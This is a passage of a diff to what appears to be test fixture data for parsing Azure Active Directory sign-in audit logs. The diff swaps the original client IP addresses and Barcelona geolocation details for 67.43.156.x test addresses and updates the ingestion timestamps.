Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3d8033cf-eecd-4eee-87a5-795efd8a1d3d\",\"InterSystemsId\":\"4e44a55e-9c0d-4cea-b000-1b79e96dcf57\",\"IntraSystemId\":\"fc33c54e-38b9-4ef2-a4ee-a3a324a45500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970167700Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3d8033cf-eecd-4eee-87a5-795efd8a1d3d\",\"InterSystemsId\":\"4e44a55e-9c0d-4cea-b000-1b79e96dcf57\",\"IntraSystemId\":\"fc33c54e-38b9-4ef2-a4ee-a3a324a45500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -2756,25 +2402,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2788,7 +2416,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -2838,7 +2466,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -2850,12 +2478,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051538500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8bd0a250-74f6-4eeb-ba20-c5bdbd977013\",\"InterSystemsId\":\"4e91c3e1-819e-4ebc-ae68-2037cfc2db92\",\"IntraSystemId\":\"a063e495-5883-4837-8186-5828f9f2d500\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970173200Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8bd0a250-74f6-4eeb-ba20-c5bdbd977013\",\"InterSystemsId\":\"4e91c3e1-819e-4ebc-ae68-2037cfc2db92\",\"IntraSystemId\":\"a063e495-5883-4837-8186-5828f9f2d500\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -2894,25 +2522,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -2926,7 +2536,7 @@ "ObjectId": "00000003-0000-0ff1-ce00-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -2976,7 +2586,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -2988,12 +2598,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051541300Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"08e18876-6177-487e-b8b5-cf950c1e598c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:44:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a6fc9a9b-3b7e-4d33-8c0c-1d33d023e558\",\"InterSystemsId\":\"50d648cb-466d-4cf4-b2f8-3b7e84f47040\",\"IntraSystemId\":\"64613cae-510d-4a52-b486-070b775e5800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970178600Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"08e18876-6177-487e-b8b5-cf950c1e598c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a6fc9a9b-3b7e-4d33-8c0c-1d33d023e558\",\"InterSystemsId\":\"50d648cb-466d-4cf4-b2f8-3b7e84f47040\",\"IntraSystemId\":\"64613cae-510d-4a52-b486-070b775e5800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -3032,25 +2642,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3064,7 +2656,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -3114,7 +2706,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -3126,12 +2718,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051544200Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:51:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"19d57a4a-d32e-4dc6-971f-3491bc440023\",\"InterSystemsId\":\"5a453031-0cc3-4577-a589-4c3bf37eed78\",\"IntraSystemId\":\"814a32f0-27fd-4e82-855c-13da15a4c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970184500Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"19d57a4a-d32e-4dc6-971f-3491bc440023\",\"InterSystemsId\":\"5a453031-0cc3-4577-a589-4c3bf37eed78\",\"IntraSystemId\":\"814a32f0-27fd-4e82-855c-13da15a4c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -3170,25 +2762,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -3202,7 +2776,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -3252,7 +2826,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -3264,12 +2838,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051547900Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"0b158f74-e223-43c8-9cfd-5f4442f29fc7\",\"InterSystemsId\":\"5cd6215d-e206-4c3f-805d-6e386cbdab7a\",\"IntraSystemId\":\"9c218a27-ed51-4011-8383-e76850e85000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970190400Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"0b158f74-e223-43c8-9cfd-5f4442f29fc7\",\"InterSystemsId\":\"5cd6215d-e206-4c3f-805d-6e386cbdab7a\",\"IntraSystemId\":\"9c218a27-ed51-4011-8383-e76850e85000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -3308,25 +2882,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -3340,7 +2896,7 @@ "ObjectId": "00000003-0000-0ff1-ce00-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Success", @@ -3390,7 +2946,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -3402,12 +2958,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051551100Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"00000003-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4819a0c2-2050-4549-ab66-f5b90cbbcc5a\",\"InterSystemsId\":\"612b339f-1088-a000-f25f-9c8af4d57894\",\"IntraSystemId\":\"c847a864-4ba2-4d8b-a9f2-5f1c1c5c5e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970195900Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000003-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4819a0c2-2050-4549-ab66-f5b90cbbcc5a\",\"InterSystemsId\":\"612b339f-1088-a000-f25f-9c8af4d57894\",\"IntraSystemId\":\"c847a864-4ba2-4d8b-a9f2-5f1c1c5c5e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -3446,25 +3002,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" 